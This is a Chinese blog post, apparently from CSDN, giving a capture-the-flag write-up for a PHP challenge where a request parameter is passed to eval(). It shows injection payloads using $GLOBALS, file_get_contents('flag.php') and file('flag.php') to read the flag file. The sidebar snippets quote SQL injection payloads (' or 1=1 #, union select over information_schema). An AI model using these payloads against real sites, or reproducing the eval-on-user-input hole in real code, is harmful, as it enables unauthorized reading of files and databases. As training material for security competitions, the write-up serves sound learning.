“百度杯”CTF比赛 2017 二月场--web 爆破-2 writeup

最新推荐文章于 2024-04-28 05:32:32 发布
最新推荐文章于 2024-04-28 05:32:32 发布
阅读量552 收藏 2
点赞数
分类专栏: CTF做题记录
会下雪的晴天
本文链接:https://blog.csdn.net/weixin_43578492/article/details/91977158
版权

题目描述

在这里插入图片描述

解题思路

点击链接得到以下代码:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
  1. 尝试将hello变为全局变量(GOLBALS)
    在URL后加?hello=$GOLBALS
    结果:
    在这里插入图片描述

得到FLAG

  1. 由第一步可知,flag不在变量中
    猜测flag在文件中,使用file_get_contents() 函数,其作用为把整个文件读入一个字符串中。
    URL?hello=file_get_contents('flag.php')右键源码得到flag
    在这里插入图片描述
  2. 也可在URL后直接加?hello=file('flag.php')
    file() 函数把整个文件读入一个数组在这里插入图片描述
会下雪的晴天
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf.show_web2解题过程
qq_38634097的博客
05-24 450
打开景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-show WEB入门--web2
m0_73912575的博客
10-25 234
CTF.show WEB入门--web2 解题write up
ctfshow-WEB-web2_ctf
最新发布
2401_84297618的博客
04-28 507
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。
CTFweb2
天天学安全专属博客
11-20 975
CTFweb2,union注入详解
ctfshow web2|手工注入|sqlmap|getshell练习
spring!
03-26 1924
爆表名 `username=2&password=3' or 1=1 union select 1,(select group_concat( table_name) from information_schema.``TABLES`` where table_schema=database() limit 0,1),3 #` ![image-20220325104245704](https://cdn.jsdelivr.net/gh/r2233r/psBed@main/img/20220326162
ctf.show_web2
小支柱的博客
05-11 404
ctfshow靶ctf.show_web2解题思路
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
CTF比赛中的常见题型-适合初学者
08-17
CTF比赛中的常见题型--适合初学者
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
内容概要: CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息... 使用景: ... 其他说明: ...
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
大阪大学CTF团队Wani Hackase提供的CTF解决方案 这是大阪大学CTF团队Wani Hackase的写存储区。 如何使用 /YYYY/MM-eventName/problemFormat-problemName/README.md # Example /2018/05-plaid/cry-braid/README.md ...
ctf.show WEB2
weixin_71543329的博客
12-08 528
思路:如下界面,猜测是数据库查询,类似这种语句:SELECT * FROM users WHERE user = '#username' AND password = '#password'采用万能密码 :admin' or 1=1;
ctf.show wed2
weixin_58519918的博客
11-18 211
基础题目无法查看源代码可以保存到本地来进行查看,目前菜狗本菜还不知道别的方法,可以通过记事本之类的查看
ctfWEB练习一
渗透测试研究中心
12-15 699
一、查找备份文件1.通过https://github.com/maurosoria/dirsearch进行目录扫描python3 dirsearch.py -u http://10.10.10.175:32770 -e *2.最终获得index.php.bk备份文件,然后下载下来查看源码,即可获得flagflag为:Cyberpeace{855A1C4B3401294CB6604CC...
百度CTF比赛 2017 二月 --- 爆破2(10分)
qq_34106499的博客
01-14 384
1. file_get_contents()函数的使用; 2. file()函数的使用; 3. show_source()函数的使用; 4. php中执行linux系统命令的多种方法; 5. eval()函数的使用。
百度CTF比赛 2017 二月Web爆破-2
Pai_Space
07-03 100
百度CTF比赛 2017 二月Web爆破-2
ctfshow web2
m0_63253040的博客
03-12 1708
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
百度CTF比赛 2017 二月——Web-爆破-2
Ifish的博客
05-07 1246
题目描述 解题思路 创建赛题,打开链接 提示说,flag不在变量中,看完代码,就想到,不在变量中,就应该在文件中了,使用get_file_contents函数,构造如下: http://f79f87d42ad840a8acdec9e8d8eb89dfb8844920bd6e4950.game.ichunqiu.com/?hello=file_get_contents(%27flag...
百度CTF比赛 2017 二月爆破-2 writeup
xuchen16的博客
09-04 502
分值:10分 类型:Misc Web已解答 题目: flag不在变量中。 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__);  题目知识点: file_get_contents(path)函数,获得指定路径下的文件内容,以字符串的形式返回...
002-CTF web题理论基础篇-第二课理论基础.pdf
07-09
在《002-CTF web题理论基础篇-第二课理论基础.pdf》和《002-CTF web题理论基础篇-第二课理论基础》中,我们学习了关于CTF网页题型的理论基础知识。本文总结了这些知识,并提供了一些相关的工具集和理论基础内容。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值